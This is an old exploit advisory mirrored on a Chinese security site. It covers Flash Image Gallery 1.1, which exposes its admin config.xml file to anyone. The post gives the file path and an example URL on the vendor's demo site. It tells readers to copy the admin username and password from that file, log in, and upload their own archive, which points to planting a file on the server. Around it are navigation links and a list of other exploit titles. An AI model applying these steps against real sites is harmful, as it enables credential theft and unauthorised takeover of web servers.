首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
Flash Image Gallery 1.1 Arbitrary Config File Disclosure Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2009-05-27  
[0x01] Informations:

Script         : Flash Image Gallery 1.1 and maybe last version
Download       : http://www.flashimagegallery.com/download/fig_116_admin_110.zip
Vulnerability  : Sensitive Data Disclosure
Author         : DarkbiteX
Greets:        : |OverclockiX| , |0o_Zeuz_o0|, |Status-X|, |Fatal Inside|, |NaOnack|, |Good-Spide|, |All Moroccan Hackers|

Bug:[Sensitive Data Disclosure]

[!] EXPLOIT: /[path]/admin/config.xml
EXAMPLE: http://www.flashimagegallery.com/demo/gallery/admin/config.xml
                 and paste de user and pass http://www.flashimagegallery.com/demo/gallery/admin/
                 Use Of The Imagination and UPLOAD your archive ;) 

# [2009-05-26]

[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·Soulseek 157 NS Remote Buffer
·Microsoft IIS 6.0 WebDAV Remot
·MyForum 1.3 (Auth Bypass) Remo
·ShaadiClone 2.0 (addadminmembe
·Kensei Board <= 2.0.0b Multipl
·phpBugTracker 1.0.3 (Auth Bypa
·ZeeCareers 2.0 (addadminmember
·Joomla Component com_rsgallery
·Flax Article Manager 1.1 (Cook
·WebMember 1.0 (formID) Remote
·Joomla Component Com_Agora 3.0
·PHP <= 5.2.9 Local Safemod Byp
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved